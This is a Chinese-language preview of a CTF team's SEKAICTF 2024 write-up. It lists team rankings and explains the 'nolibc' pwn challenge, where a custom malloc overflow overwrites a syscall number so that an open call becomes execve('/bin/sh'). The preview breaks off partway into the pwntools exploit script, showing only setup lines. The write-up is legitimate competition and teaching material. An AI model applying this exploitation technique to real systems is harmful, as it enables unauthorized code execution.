文章预览
本次 SEKAICTF 2024,我们Polaris战队排名第55。 排名 队伍 总分 51 dtl 1003 52 ${cystick} 974 53 Kal3 973 54 traP 939 55 Polaris 925 56 h4tum 913 57 Hack@Sec 903 58 Slug Security 877 59 Zer0Tolerance 865 60 Arr3stY0u 861 01 PWN 1 nolibc 自己实现的malloc有缺陷,导致我把所有的内存分配得只剩下0x40,然后申请0x3f的时候,造成了溢出,而内存下面相邻的是系统调用号,覆盖后可修改 通过调试发现在load文件的时候,调用了open,可以控制rdi,同时rsi和rdx都是0,正好符合execve("/bin/sh",0,0)的要求 exp #!/usr/bin/env python # -*- encoding: utf -8 -*- ''' @File : pwn1.py @Time : 2024 / 08 / 24 13 : 11 : 28 @Author : 5 ma11wh1t3 @Contact : 197489628 @qq.com ''' from pwn import * # from LibcSearcher import * context.terminal = [ 'tmux' , 'splitw' , '-h' ] context.log_level=True context.arch= 'amd64' elf_path = './main' debug = 1 if debug: p = process(elf_path)
………………………………
